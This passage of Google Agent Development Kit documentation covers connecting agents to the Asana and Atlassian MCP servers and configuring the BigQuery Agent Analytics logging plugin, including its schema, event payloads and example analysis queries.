    instruction="Help users manage projects, tasks, and goals in Asana",
    tools=[
        McpToolset(
            connection_params=StdioConnectionParams(
                server_params=StdioServerParameters(
                    command="npx",
                    args=[
                        "-y",
                        "mcp-remote",
                        "https://mcp.asana.com/sse",
                    ]
                ),
                timeout=30,
            ),
        )
    ],
)
```

```typescript
import { LlmAgent, MCPToolset } from "@google/adk";

const rootAgent = new LlmAgent({
    model: "gemini-2.5-pro",
    name: "asana_agent",
    instruction: "Help users manage projects, tasks, and goals in Asana",
    tools: [
        new MCPToolset({
            type: "StdioConnectionParams",
            serverParams: {
                command: "npx",
                args: [
                    "-y",
                    "mcp-remote",
                    "https://mcp.asana.com/sse",
                ],
            },
        }),
    ],
});

export { rootAgent };
```

**Note:** When you run this agent for the first time, a browser window opens automatically to request access via OAuth. Alternatively, you can use the authorization URL printed in the console. You must approve this request to allow the agent to access your Asana data.

## Available tools

Asana's MCP server includes 30+ tools organized by category. Tools are automatically discovered when your agent connects. Use the [ADK Web UI](/adk-docs/runtime/web-interface/) to view available tools in the trace graph after running your agent.
| Category | Description |
| ----------------- | ------------------------------------------- |
| Project tracking | Get project status updates and reports |
| Task management | Create, update, and organize tasks |
| User information | Access user details and assignments |
| Goals | Track and update Asana Goals |
| Team organization | Manage team structures and membership |
| Object search | Quick typeahead search across Asana objects |

## Additional resources

- [Asana MCP Server Documentation](https://developers.asana.com/docs/using-asanas-mcp-server)
- [Asana MCP Integration Guide](https://developers.asana.com/docs/integrating-with-asanas-mcp-server)

# Atlassian MCP tool for ADK

Supported in ADK: Python, TypeScript

The [Atlassian MCP Server](https://github.com/atlassian/atlassian-mcp-server) connects your ADK agent to the [Atlassian](https://www.atlassian.com/) ecosystem, bridging the gap between project tracking in Jira and knowledge management in Confluence. This integration gives your agent the ability to manage issues, search and update documentation pages, and streamline collaboration workflows using natural language.

## Use cases

- **Unified Knowledge Search**: Search across both Jira issues and Confluence pages simultaneously to find project specs, decisions, or historical context.
- **Automate Issue Management**: Create, edit, and transition Jira issues, or add comments to existing tickets.
- **Documentation Assistant**: Retrieve page content, generate drafts, or add inline comments to Confluence documents directly from your agent.
## Prerequisites

- Sign up for an [Atlassian account](https://id.atlassian.com/signup)
- An Atlassian Cloud site with Jira and/or Confluence

## Use with agent

```python
from google.adk.agents import Agent
from google.adk.tools.mcp_tool import McpToolset
from google.adk.tools.mcp_tool.mcp_session_manager import StdioConnectionParams
from mcp import StdioServerParameters

root_agent = Agent(
    model="gemini-2.5-pro",
    name="atlassian_agent",
    instruction="Help users work with data in Atlassian products",
    tools=[
        McpToolset(
            connection_params=StdioConnectionParams(
                server_params=StdioServerParameters(
                    command="npx",
                    args=[
                        "-y",
                        "mcp-remote",
                        "https://mcp.atlassian.com/v1/mcp",
                    ]
                ),
                timeout=30,
            ),
        )
    ],
)
```

```typescript
import { LlmAgent, MCPToolset } from "@google/adk";

const rootAgent = new LlmAgent({
    model: "gemini-2.5-pro",
    name: "atlassian_agent",
    instruction: "Help users work with data in Atlassian products",
    tools: [
        new MCPToolset({
            type: "StdioConnectionParams",
            serverParams: {
                command: "npx",
                args: [
                    "-y",
                    "mcp-remote",
                    "https://mcp.atlassian.com/v1/mcp",
                ],
            },
        }),
    ],
});

export { rootAgent };
```

**Note:** When you run this agent for the first time, a browser window opens automatically to request access via OAuth. Alternatively, you can use the authorization URL printed in the console. You must approve this request to allow the agent to access your Atlassian data.
## Available tools

| Tool | Description |
| ---------------------------------- | ---------------------------------------------------------- |
| `atlassianUserInfo` | Get information about the user |
| `getAccessibleAtlassianResources` | Get information about accessible Atlassian resources |
| `getJiraIssue` | Get information about a Jira issue |
| `editJiraIssue` | Edit a Jira issue |
| `createJiraIssue` | Create a new Jira issue |
| `getTransitionsForJiraIssue` | Get transitions for a Jira issue |
| `transitionJiraIssue` | Transition a Jira issue |
| `lookupJiraAccountId` | Look up a Jira account ID |
| `searchJiraIssuesUsingJql` | Search Jira issues using JQL |
| `addCommentToJiraIssue` | Add a comment to a Jira issue |
| `getJiraIssueRemoteIssueLinks` | Get remote issue links for a Jira issue |
| `getVisibleJiraProjects` | Get visible Jira projects |
| `getJiraProjectIssueTypesMetadata` | Get issue types metadata for a Jira project |
| `getJiraIssueTypeMetaWithFields` | Get issue type metadata with fields for a Jira issue |
| `getConfluenceSpaces` | Get information about Confluence spaces |
| `getConfluencePage` | Get information about a Confluence page |
| `getPagesInConfluenceSpace` | Get information about pages in a Confluence space |
| `getConfluencePageFooterComments` | Get information about footer comments in a Confluence page |
| `getConfluencePageInlineComments` | Get information about inline comments in a Confluence page |
| `getConfluencePageDescendants` | Get information about descendants of a Confluence page |
| `createConfluencePage` | Create a new Confluence page |
| `updateConfluencePage` | Update an existing Confluence page |
| `createConfluenceFooterComment` | Create a footer comment in a Confluence page |
| `createConfluenceInlineComment` | Create an inline comment in a Confluence page |
| `searchConfluenceUsingCql` | Search Confluence using CQL |
| `search` | Search for information |
| `fetch` | Fetch information |

## Additional resources

- [Atlassian MCP Server Repository](https://github.com/atlassian/atlassian-mcp-server)
- [Atlassian MCP Server Documentation](https://support.atlassian.com/atlassian-rovo-mcp-server/docs/getting-started-with-the-atlassian-remote-mcp-server/)

# BigQuery Agent Analytics plugin for ADK

Supported in ADK: Python v1.21.0 (Preview)

**Version requirement:** Use ADK Python version 1.21.0 or higher to make full use of the features described in this document.

The BigQuery Agent Analytics Plugin extends the Agent Development Kit (ADK) with in-depth agent behavior analysis. Using the ADK Plugin architecture and the **BigQuery Storage Write API**, it captures and logs operational events directly into a Google BigQuery table, which you can use for debugging, real-time monitoring, and offline performance evaluation.

Version 1.21.0 introduces **Hybrid Multimodal Logging**, allowing you to log large payloads (images, audio, blobs) by offloading them to Google Cloud Storage (GCS) while keeping a structured reference (`ObjectRef`) in BigQuery.

**Preview release:** The BigQuery Agent Analytics Plugin is in Preview release. For more information, see the [launch stage descriptions](https://cloud.google.com/products#product-launch-stages).

**BigQuery Storage Write API:** This feature uses **BigQuery Storage Write API**, which is a paid service. For information on costs, see the [BigQuery documentation](https://cloud.google.com/bigquery/pricing?e=48754805&hl=en#data-ingestion-pricing).

## Use cases

- **Agent workflow debugging and analysis:** Capture a wide range of *plugin lifecycle events* (LLM calls, tool usage) and *agent-yielded events* (user input, model responses) into a well-defined schema.
- **High-volume analysis and debugging:** Logging operations are performed asynchronously using the Storage Write API to allow high throughput and low latency.
- **Multimodal Analysis**: Log and analyze text, images, and other modalities. Large files are offloaded to GCS, making them accessible to BigQuery ML via Object Tables.
- **Distributed Tracing**: Built-in support for OpenTelemetry-style tracing (`trace_id`, `span_id`) to visualize agent execution flows.

The agent event data recorded varies based on the ADK event type. For more information, see [Event types and payloads](#event-types).

## Prerequisites

- **Google Cloud Project** with the **BigQuery API** enabled.
- **BigQuery Dataset:** Create a dataset to store logging tables before using the plugin. The plugin automatically creates the necessary events table within the dataset if the table does not exist.
- **Google Cloud Storage Bucket (Optional):** If you plan to log multimodal content (images, audio, etc.), creating a GCS bucket is recommended for offloading large files.
- **Authentication:**
  - **Local:** Run `gcloud auth application-default login`.
  - **Cloud:** Ensure your service account has the required permissions.

### IAM permissions

For the agent to work properly, the principal (e.g., service account, user account) under which the agent is running needs these Google Cloud roles:

- `roles/bigquery.jobUser` at Project Level to run BigQuery queries.
- `roles/bigquery.dataEditor` at Table Level to write log/event data.
- **If using GCS offloading:** `roles/storage.objectCreator` and `roles/storage.objectViewer` on the target bucket.

## Use with agent

You use the BigQuery Agent Analytics Plugin by configuring and registering it with your ADK agent's App object.
The following example shows an implementation of an agent with this plugin, including GCS offloading:

```python
# my_bq_agent/agent.py
import os
import google.auth
from google.adk.apps import App
from google.adk.plugins.bigquery_agent_analytics_plugin import BigQueryAgentAnalyticsPlugin, BigQueryLoggerConfig
from google.adk.agents import Agent
from google.adk.models.google_llm import Gemini
from google.adk.tools.bigquery import BigQueryToolset, BigQueryCredentialsConfig

# --- OpenTelemetry Initialization (Optional) ---
# Recommended for enabling distributed tracing (populates trace_id, span_id).
# If not configured, the plugin uses internal UUIDs for span correlation.
try:
    from opentelemetry import trace
    from opentelemetry.sdk.trace import TracerProvider
    trace.set_tracer_provider(TracerProvider())
except ImportError:
    pass  # OpenTelemetry is optional

# --- Configuration ---
PROJECT_ID = os.environ.get("GOOGLE_CLOUD_PROJECT", "your-gcp-project-id")
DATASET_ID = os.environ.get("BIG_QUERY_DATASET_ID", "your-big-query-dataset-id")
LOCATION = os.environ.get("GOOGLE_CLOUD_LOCATION", "US")  # default location is US in the plugin
GCS_BUCKET = os.environ.get("GCS_BUCKET_NAME", "your-gcs-bucket-name")  # Optional

if PROJECT_ID == "your-gcp-project-id":
    raise ValueError("Please set GOOGLE_CLOUD_PROJECT or update the code.")

# --- CRITICAL: Set environment variables BEFORE Gemini instantiation ---
os.environ['GOOGLE_CLOUD_PROJECT'] = PROJECT_ID
os.environ['GOOGLE_CLOUD_LOCATION'] = LOCATION
os.environ['GOOGLE_GENAI_USE_VERTEXAI'] = 'True'

# --- Initialize the Plugin with Config ---
bq_config = BigQueryLoggerConfig(
    enabled=True,
    gcs_bucket_name=GCS_BUCKET,  # Enable GCS offloading for multimodal content
    log_multi_modal_content=True,
    max_content_length=500 * 1024,  # 500 KB limit for inline text
    batch_size=1,  # Default is 1 for low latency, increase for high throughput
    shutdown_timeout=10.0
)

bq_logging_plugin = BigQueryAgentAnalyticsPlugin(
    project_id=PROJECT_ID,
    dataset_id=DATASET_ID,
    table_id="agent_events_v2",  # default table name is agent_events_v2
    config=bq_config,
    location=LOCATION
)

# --- Initialize Tools and Model ---
credentials, _ = google.auth.default(scopes=["https://www.googleapis.com/auth/cloud-platform"])
bigquery_toolset = BigQueryToolset(
    credentials_config=BigQueryCredentialsConfig(credentials=credentials)
)

llm = Gemini(model="gemini-2.5-flash")

root_agent = Agent(
    model=llm,
    name='my_bq_agent',
    instruction="You are a helpful assistant with access to BigQuery tools.",
    tools=[bigquery_toolset]
)

# --- Create the App ---
app = App(
    name="my_bq_agent",
    root_agent=root_agent,
    plugins=[bq_logging_plugin],
)
```

### Run and test agent

Test the plugin by running the agent and making a few requests through the chat interface, such as "tell me what you can do" or "List datasets in my cloud project". These actions create events which are recorded in your Google Cloud project BigQuery instance. Once these events have been processed, you can view the data for them in the [BigQuery Console](https://console.cloud.google.com/bigquery), using this query:

```sql
SELECT timestamp, event_type, content
FROM `your-gcp-project-id.your-big-query-dataset-id.agent_events_v2`
ORDER BY timestamp DESC
LIMIT 20;
```

## Tracing and Observability

The plugin supports **OpenTelemetry** for distributed tracing.

- **Automatic Span Management**: The plugin automatically generates spans for Agent execution, LLM calls, and Tool executions.
- **OpenTelemetry Integration**: If an OpenTelemetry `TracerProvider` is configured (as shown in the example above), the plugin will use valid OTel spans, populating `trace_id`, `span_id`, and `parent_span_id` with standard OTel identifiers. This allows you to correlate agent logs with other services in your distributed system.
- **Fallback Mechanism**: If OpenTelemetry is not installed or configured, the plugin automatically falls back to generating internal UUIDs for spans and uses the `invocation_id` as the trace ID. This ensures that the parent-child hierarchy (Agent -> Span -> Tool/LLM) is *always* preserved in the BigQuery logs, even without a full OTel setup.

## Configuration options

You can customize the plugin using `BigQueryLoggerConfig`.

- **`enabled`** (`bool`, default: `True`): To disable the plugin from logging agent data to the BigQuery table, set this parameter to `False`.
- **`clustering_fields`** (`List[str]`, default: `["event_type", "agent", "user_id"]`): The fields used to cluster the BigQuery table when it is automatically created.
- **`gcs_bucket_name`** (`Optional[str]`, default: `None`): The name of the GCS bucket to offload large content (images, blobs, large text) to. If not provided, large content may be truncated or replaced with placeholders.
- **`connection_id`** (`Optional[str]`, default: `None`): The BigQuery connection ID (e.g., `us.my-connection`) to use as the authorizer for `ObjectRef` columns. Required for using `ObjectRef` with BigQuery ML.
- **`max_content_length`** (`int`, default: `500 * 1024`): The maximum length (in characters) of text content to store **inline** in BigQuery before offloading to GCS (if configured) or truncating. Default is 500 KB.
- **`batch_size`** (`int`, default: `1`): The number of events to batch before writing to BigQuery.
- **`batch_flush_interval`** (`float`, default: `1.0`): The maximum time (in seconds) to wait before flushing a partial batch.
- **`shutdown_timeout`** (`float`, default: `10.0`): Seconds to wait for logs to flush during shutdown.
- **`event_allowlist`** (`Optional[List[str]]`, default: `None`): A list of event types to log. If `None`, all events are logged except those in `event_denylist`. For a comprehensive list of supported event types, refer to the [Event types and payloads](#event-types) section.
- **`event_denylist`** (`Optional[List[str]]`, default: `None`): A list of event types to skip logging. For a comprehensive list of supported event types, refer to the [Event types and payloads](#event-types) section.
- **`content_formatter`** (`Optional[Callable[[Any, str], Any]]`, default: `None`): An optional function to format event content before logging.
- **`log_multi_modal_content`** (`bool`, default: `True`): Whether to log detailed content parts (including GCS references).
- **`queue_max_size`** (`int`, default: `10000`): The maximum number of events to hold in the in-memory queue before dropping new events.
- **`retry_config`** (`RetryConfig`, default: `RetryConfig()`): Configuration for retrying failed BigQuery writes (attributes: `max_retries`, `initial_delay`, `multiplier`, `max_delay`).
- **`log_session_metadata`** (`bool`, default: `True`): If `True`, logs metadata from the `session` object (e.g., `session.metadata`) into the `attributes` column.
- **`custom_tags`** (`Dict[str, Any]`, default: `{}`): A dictionary of static tags (e.g., `{"env": "prod", "version": "1.0"}`) to be included in the `attributes` column for every event.

The following code sample shows how to define a configuration for the BigQuery Agent Analytics plugin:

```python
import json
import re
from typing import Any

from google.adk.plugins.bigquery_agent_analytics_plugin import (
    BigQueryAgentAnalyticsPlugin,
    BigQueryLoggerConfig,
)


def redact_dollar_amounts(event_content: Any, event_type: str = "") -> str:
    """
    Custom formatter to redact dollar amounts (e.g., $600, $12.50)
    and ensure JSON output if the input is a dict.

    The optional second argument follows the `Callable[[Any, str], Any]`
    signature listed above; it is not used by this formatter.
    """
    text_content = ""
    if isinstance(event_content, dict):
        text_content = json.dumps(event_content)
    else:
        text_content = str(event_content)

    # Regex to find dollar amounts: $ followed by digits, optionally with commas or decimals.
    # Examples: $600, $1,200.50, $0.99
    redacted_content = re.sub(r'\$\d+(?:,\d{3})*(?:\.\d+)?', 'xxx', text_content)
    return redacted_content


config = BigQueryLoggerConfig(
    enabled=True,
    event_allowlist=["LLM_REQUEST", "LLM_RESPONSE"],  # Only log these events
    # event_denylist=["TOOL_STARTING"],  # Skip these events
    shutdown_timeout=10.0,  # Wait up to 10s for logs to flush on exit
    client_close_timeout=2.0,  # Wait up to 2s for BQ client to close
    max_content_length=500,  # Truncate content to 500 chars
    content_formatter=redact_dollar_amounts,  # Redact the dollar amounts in the logging content
    queue_max_size=10000,  # Max events to hold in memory
    # retry_config=RetryConfig(max_retries=3),  # Optional: Configure retries
)

plugin = BigQueryAgentAnalyticsPlugin(..., config=config)
```

## Schema and production setup

### Schema Reference

The events table (`agent_events_v2`) uses a flexible schema. The following table provides a comprehensive reference with example values.

| Field Name | Type | Mode | Description | Example Value |
| ------------------ | ----------- | ---------- | ----------- | ------------- |
| **timestamp** | `TIMESTAMP` | `REQUIRED` | UTC timestamp of event creation. Acts as the primary ordering key and often the daily partitioning key. Precision is microsecond. | `2026-02-03 20:52:17 UTC` |
| **event_type** | `STRING` | `NULLABLE` | The canonical event category. Standard values include `LLM_REQUEST`, `LLM_RESPONSE`, `TOOL_STARTING`, `TOOL_COMPLETED`, `AGENT_STARTING`, `AGENT_COMPLETED`, `STATE_DELTA`. Used for high-level filtering. | `LLM_REQUEST` |
| **agent** | `STRING` | `NULLABLE` | The name of the agent responsible for this event. Defined during agent initialization or via the `root_agent_name` context. | `my_bq_agent` |
| **session_id** | `STRING` | `NULLABLE` | A persistent identifier for the entire conversation thread. Stays constant across multiple turns and sub-agent calls. | `04275a01-1649-4a30-b6a7-5b443c69a7bc` |
| **invocation_id** | `STRING` | `NULLABLE` | The unique identifier for a single execution turn or request cycle. Corresponds to `trace_id` in many contexts. | `e-b55b2000-68c6-4e8b-b3b3-ffb454a92e40` |
| **user_id** | `STRING` | `NULLABLE` | The identifier of the user (human or system) initiating the session. Extracted from the `User` object or metadata. | `test_user` |
| **trace_id** | `STRING` | `NULLABLE` | The **OpenTelemetry** Trace ID (32-char hex). Links all operations within a single distributed request lifecycle. | `e-b55b2000-68c6-4e8b-b3b3-ffb454a92e40` |
| **span_id** | `STRING` | `NULLABLE` | The **OpenTelemetry** Span ID (16-char hex). Uniquely identifies this specific atomic operation. | `69867a836cd94798be2759d8e0d70215` |
| **parent_span_id** | `STRING` | `NULLABLE` | The Span ID of the immediate caller. Used to reconstruct the parent-child execution tree (DAG). | `ef5843fe40764b4b8afec44e78044205` |
| **content** | `JSON` | `NULLABLE` | The primary event payload. Structure is polymorphic based on `event_type`. | `{"system_prompt": "You are...", "prompt": [{"role": "user", "content": "hello"}], "response": "Hi", "usage": {"total": 15}}` |
| **attributes** | `JSON` | `NULLABLE` | Metadata/Enrichment (usage stats, model info, custom tags). | `{"model": "gemini-2.5-flash", "usage_metadata": {"total_token_count": 15}, "state_delta": {"key": "val"}, "session_metadata": {"key": "val"}}` |
| **latency_ms** | `JSON` | `NULLABLE` | Performance metrics. Standard keys are `total_ms` (wall-clock duration) and `time_to_first_token_ms` (streaming latency). | `{"total_ms": 1250, "time_to_first_token_ms": 450}` |
| **status** | `STRING` | `NULLABLE` | High-level outcome. Values: `OK` (success) or `ERROR` (failure). | `OK` |
| **error_message** | `STRING` | `NULLABLE` | Human-readable exception message or stack trace fragment. Populated only when `status` is `ERROR`. | `Error 404: Dataset not found` |
| **is_truncated** | `BOOLEAN` | `NULLABLE` | `true` if `content` or `attributes` exceeded the BigQuery cell size limit (default 10MB) and were partially dropped. | `false` |
| **content_parts** | `RECORD` | `REPEATED` | Array of multi-modal segments (Text, Image, Blob). Used when content cannot be serialized as simple JSON (e.g., large binaries or GCS refs). | `[{"mime_type": "text/plain", "text": "hello"}]` |

The plugin automatically creates the table if it does not exist. However, for production, we recommend creating the table manually using the following DDL, which uses the **JSON** type for flexibility and **REPEATED RECORD**s for multimodal content.

**Recommended DDL:**

```sql
CREATE TABLE `your-gcp-project-id.adk_agent_logs.agent_events_v2`
(
  timestamp TIMESTAMP NOT NULL OPTIONS(description="The UTC time at which the event was logged."),
  event_type STRING OPTIONS(description="Indicates the type of event being logged (e.g., 'LLM_REQUEST', 'TOOL_COMPLETED')."),
  agent STRING OPTIONS(description="The name of the ADK agent or author associated with the event."),
  session_id STRING OPTIONS(description="A unique identifier to group events within a single conversation or user session."),
  invocation_id STRING OPTIONS(description="A unique identifier for each individual agent execution or turn within a session."),
  user_id STRING OPTIONS(description="The identifier of the user associated with the current session."),
  trace_id STRING OPTIONS(description="OpenTelemetry trace ID for distributed tracing."),
  span_id STRING OPTIONS(description="OpenTelemetry span ID for this specific operation."),
  parent_span_id STRING OPTIONS(description="OpenTelemetry parent span ID to reconstruct hierarchy."),
  content JSON OPTIONS(description="The event-specific data (payload) stored as JSON."),
  content_parts ARRAY<STRUCT<
    mime_type STRING,
    uri STRING,
    object_ref STRUCT<
      uri STRING,
      version STRING,
      authorizer STRING,
      details JSON
    >,
    text STRING,
    part_index INT64,
    part_attributes STRING,
    storage_mode STRING
  >> OPTIONS(description="Detailed content parts for multi-modal data."),
  attributes JSON OPTIONS(description="Arbitrary key-value pairs for additional metadata (e.g., 'root_agent_name', 'model_version', 'usage_metadata', 'session_metadata', 'custom_tags')."),
  latency_ms JSON OPTIONS(description="Latency measurements (e.g., total_ms)."),
  status STRING OPTIONS(description="The outcome of the event, typically 'OK' or 'ERROR'."),
  error_message STRING OPTIONS(description="Populated if an error occurs."),
  is_truncated BOOLEAN OPTIONS(description="Flag indicates if content was truncated.")
)
PARTITION BY DATE(timestamp)
CLUSTER BY event_type, agent, user_id;
```

### Event types and payloads

The `content` column now contains a **JSON** object specific to the `event_type`. The `content_parts` column provides a structured view of the content, especially useful for images or offloaded data.

**Content truncation:**

- Variable content fields are truncated to `max_content_length` (configured in `BigQueryLoggerConfig`, default 500KB).
- If `gcs_bucket_name` is configured, large content is offloaded to GCS instead of being truncated, and a reference is stored in `content_parts.object_ref`.

#### LLM interactions (plugin lifecycle)

These events track the raw requests sent to and responses received from the LLM.

**1. LLM_REQUEST**

Captures the prompt sent to the model, including conversation history and system instructions.

```json
{
  "event_type": "LLM_REQUEST",
  "content": {
    "system_prompt": "You are a helpful assistant...",
    "prompt": [
      {
        "role": "user",
        "content": "hello how are you today"
      }
    ]
  },
  "attributes": {
    "model": "gemini-2.5-flash",
    "llm_config": {
      "temperature": 0.5,
      "top_p": 0.9
    }
  }
}
```

**2. LLM_RESPONSE**

Captures the model's output and token usage statistics.
```json { "event_type": "LLM_RESPONSE", "content": { "response": "text: 'Hello! I'm doing well...'", "usage": { "completion": 19, "prompt": 10129, "total": 10148 } }, "attributes": { "usage_metadata": { "prompt_token_count": 10129, "candidates_token_count": 19, "total_token_count": 10148 } }, "latency_ms": { "time_to_first_token_ms": 2579, "total_ms": 2579 } } ``` #### Tool usage (plugin lifecycle) These events track the execution of tools by the agent. **3. TOOL_STARTING** Logged when an agent begins executing a tool. ```json { "event_type": "TOOL_STARTING", "content": { "tool": "list_dataset_ids", "args": { "project_id": "bigquery-public-data" } } } ``` **4. TOOL_COMPLETED** Logged when a tool execution finishes. ```json { "event_type": "TOOL_COMPLETED", "content": { "tool": "list_dataset_ids", "result": [ "austin_311", "austin_bikeshare" ] }, "latency_ms": { "total_ms": 467 } } ``` #### State Management These events track changes to the agent's state, typically triggered by tools. **5. STATE_DELTA** Tracks changes to the agent's internal state (e.g., token cache updates). ```json { "event_type": "STATE_DELTA", "attributes": { "state_delta": { "bigquery_token_cache": "{\"token\": \"ya29...\", \"expiry\": \"...\"}" } } } ``` #### Agent lifecycle & Generic Events | **Event Type** | **Content (JSON) Structure** | | ----------------------- | -------------------------------------------- | | `INVOCATION_STARTING` | `{}` | | `INVOCATION_COMPLETED` | `{}` | | `AGENT_STARTING` | `"You are a helpful agent..."` | | `AGENT_COMPLETED` | `{}` | | `USER_MESSAGE_RECEIVED` | `{"text_summary": "Help me book a flight."}` | #### GCS Offloading Examples (Multimodal & Large Text) When `gcs_bucket_name` is configured, large text and multimodal content (images, audio, etc.) are automatically offloaded to GCS. The `content` column will contain a summary or placeholder, while `content_parts` contains the `object_ref` pointing to the GCS URI. 
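As a rough illustration of how a consumer might handle these rows, the sketch below separates inline parts from offloaded ones. It assumes a row has already been fetched and converted to a plain Python dict whose `content_parts` entries carry the `storage_mode` and `object_ref` fields shown in this section. The helper `split_content_parts` and the sample row (including its bucket name) are hypothetical and not part of ADK or the plugin.

```python
from typing import Any


def split_content_parts(row: dict[str, Any]) -> tuple[list[str], list[str]]:
    """Return (inline_texts, gcs_uris) for one logged event row.

    Hypothetical helper: assumes `row` is a plain dict with a
    `content_parts` list shaped like the examples in this section.
    """
    inline_texts: list[str] = []
    gcs_uris: list[str] = []
    for part in row.get("content_parts") or []:
        object_ref = part.get("object_ref") or {}
        if part.get("storage_mode") == "GCS_REFERENCE" and object_ref.get("uri"):
            # Offloaded part: `text` holds only a placeholder, so keep the URI.
            gcs_uris.append(object_ref["uri"])
        elif part.get("text") is not None:
            # Inline part: the text is stored directly in the row.
            inline_texts.append(part["text"])
    return inline_texts, gcs_uris


# Illustrative row; the bucket and object names are made up.
sample_row = {
    "event_type": "LLM_REQUEST",
    "content_parts": [
        {"part_index": 0, "mime_type": "text/plain", "text": "hello"},
        {
            "part_index": 1,
            "mime_type": "image/png",
            "storage_mode": "GCS_REFERENCE",
            "text": "[MEDIA OFFLOADED]",
            "object_ref": {"uri": "gs://example-bucket/part_1.png"},
        },
    ],
}

inline_texts, gcs_uris = split_content_parts(sample_row)
print(inline_texts)
print(gcs_uris)
```

Reading the object behind each URI is deliberately left out; the signed-URL query later in this section is one way to do that from BigQuery.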
**Offloaded Text Example** ```json { "event_type": "LLM_REQUEST", "content_parts": [ { "part_index": 1, "mime_type": "text/plain", "storage_mode": "GCS_REFERENCE", "text": "AAAA... [OFFLOADED]", "object_ref": { "uri": "gs://haiyuan-adk-debug-verification-1765319132/2025-12-10/e-f9545d6d/ae5235e6_p1.txt", "authorizer": "us.bqml_connection", "details": {"gcs_metadata": {"content_type": "text/plain"}} } } ] } ``` **Offloaded Image Example** ```json { "event_type": "LLM_REQUEST", "content_parts": [ { "part_index": 2, "mime_type": "image/png", "storage_mode": "GCS_REFERENCE", "text": "[MEDIA OFFLOADED]", "object_ref": { "uri": "gs://haiyuan-adk-debug-verification-1765319132/2025-12-10/e-f9545d6d/ae5235e6_p2.png", "authorizer": "us.bqml_connection", "details": {"gcs_metadata": {"content_type": "image/png"}} } } ] } ``` **Querying Offloaded Content (Get Signed URLs)** ```sql SELECT timestamp, event_type, part.mime_type, part.storage_mode, part.object_ref.uri AS gcs_uri, -- Generate a signed URL to read the content directly (requires connection_id configuration) STRING(OBJ.GET_ACCESS_URL(part.object_ref, 'r').access_urls.read_url) AS signed_url FROM `your-gcp-project-id.your-dataset-id.agent_events_v2`, UNNEST(content_parts) AS part WHERE part.storage_mode = 'GCS_REFERENCE' ORDER BY timestamp DESC LIMIT 10; ``` ## Advanced analysis queries **Trace a specific conversation turn using trace_id** ```sql SELECT timestamp, event_type, agent, JSON_VALUE(content, '$.response') as summary FROM `your-gcp-project-id.your-dataset-id.agent_events_v2` WHERE trace_id = 'your-trace-id' ORDER BY timestamp ASC; ``` **Token usage analysis (accessing JSON fields)** ```sql SELECT AVG(CAST(JSON_VALUE(content, '$.usage.total') AS INT64)) as avg_tokens FROM `your-gcp-project-id.your-dataset-id.agent_events_v2` WHERE event_type = 'LLM_RESPONSE'; ``` **Querying Multimodal Content (using content_parts and ObjectRef)** ```sql SELECT timestamp, part.mime_type, part.object_ref.uri as gcs_uri FROM 
`your-gcp-project-id.your-dataset-id.agent_events_v2`, UNNEST(content_parts) as part WHERE part.mime_type LIKE 'image/%' ORDER BY timestamp DESC; ``` **Analyze Multimodal Content with BigQuery Remote Model (Gemini)** ```sql SELECT logs.session_id, -- Get a signed URL for the image STRING(OBJ.GET_ACCESS_URL(parts.object_ref, "r").access_urls.read_url) as signed_url, -- Analyze the image using a remote model (e.g., gemini-pro-vision) AI.GENERATE( ('Describe this image briefly. What company logo?', parts.object_ref) ) AS generated_result FROM `your-gcp-project-id.your-dataset-id.agent_events_v2` logs, UNNEST(logs.content_parts) AS parts WHERE parts.mime_type LIKE 'image/%' ORDER BY logs.timestamp DESC LIMIT 1; ``` **Latency Analysis (LLM & Tools)** ```sql SELECT event_type, AVG(CAST(JSON_VALUE(latency_ms, '$.total_ms') AS INT64)) as avg_latency_ms FROM `your-gcp-project-id.your-dataset-id.agent_events_v2` WHERE event_type IN ('LLM_RESPONSE', 'TOOL_COMPLETED') GROUP BY event_type; ``` **Span Hierarchy & Duration Analysis** ```sql SELECT span_id, parent_span_id, event_type, timestamp, -- Extract duration from latency_ms for completed operations CAST(JSON_VALUE(latency_ms, '$.total_ms') AS INT64) as duration_ms, -- Identify the specific tool or operation COALESCE( JSON_VALUE(content, '$.tool'), 'LLM_CALL' ) as operation FROM `your-gcp-project-id.your-dataset-id.agent_events_v2` WHERE trace_id = 'your-trace-id' AND event_type IN ('LLM_RESPONSE', 'TOOL_COMPLETED') ORDER BY timestamp ASC; ``` ### 7. AI-Powered Root Cause Analysis (Agent Ops) Automatically analyze failed sessions to determine the root cause of errors using BigQuery ML and Gemini. 
```sql DECLARE failed_session_id STRING; -- Find a recent failed session SET failed_session_id = ( SELECT session_id FROM `your-gcp-project-id.your-dataset-id.agent_events_v2` WHERE error_message IS NOT NULL ORDER BY timestamp DESC LIMIT 1 ); -- Reconstruct the full conversation context WITH SessionContext AS ( SELECT session_id, STRING_AGG(CONCAT(event_type, ': ', COALESCE(TO_JSON_STRING(content), '')), '\n' ORDER BY timestamp) as full_history FROM `your-gcp-project-id.your-dataset-id.agent_events_v2` WHERE session_id = failed_session_id GROUP BY session_id ) -- Ask Gemini to diagnose the issue SELECT session_id, AI.GENERATE( ('Analyze this conversation log and explain the root cause of the failure. Log: ', full_history), connection_id => 'your-gcp-project-id.us.my-connection', endpoint => 'gemini-2.5-flash' ).result AS root_cause_explanation FROM SessionContext; ``` ## Conversational Analytics in BigQuery You can also use [BigQuery Conversational Analytics](https://cloud.google.com/bigquery/docs/conversational-analytics) to analyze your agent logs using natural language. Use this tool to answer questions like: - "Show me the error rate over time" - "What are the most common tool calls?" - "Identify sessions with high token usage" ## Looker Studio Dashboard You can visualize your agent's performance using our pre-built [Looker Studio Dashboard template](https://lookerstudio.google.com/c/reporting/f1c5b513-3095-44f8-90a2-54953d41b125/page/8YdhF). 
To connect this dashboard to your own BigQuery table, use the following link format, filling in the empty `ds.ds3.projectId`, `ds.ds3.datasetId`, and `ds.ds3.tableId` parameters with your own project, dataset, and table IDs: ```text https://lookerstudio.google.com/reporting/create?c.reportId=f1c5b513-3095-44f8-90a2-54953d41b125&ds.ds3.connector=bigQuery&ds.ds3.type=TABLE&ds.ds3.projectId=&ds.ds3.datasetId=&ds.ds3.tableId= ``` ## Additional resources - [BigQuery Storage Write API](https://cloud.google.com/bigquery/docs/write-api) - [Introduction to Object Tables](https://cloud.google.com/bigquery/docs/object-tables-intro) - [Interactive Demo Notebook](https://github.com/haiyuan-eng-google/demo_BQ_agent_analytics_plugin_notebook) # BigQuery tool for ADK Supported in ADK: Python v1.1.0 This set of tools provides integration with BigQuery: - **`list_dataset_ids`**: Fetches the BigQuery dataset IDs present in a GCP project. - **`get_dataset_info`**: Fetches metadata about a BigQuery dataset. - **`list_table_ids`**: Fetches the table IDs present in a BigQuery dataset. - **`get_table_info`**: Fetches metadata about a BigQuery table. - **`execute_sql`**: Runs a SQL query in BigQuery and fetches the result. - **`forecast`**: Runs a BigQuery AI time series forecast using the 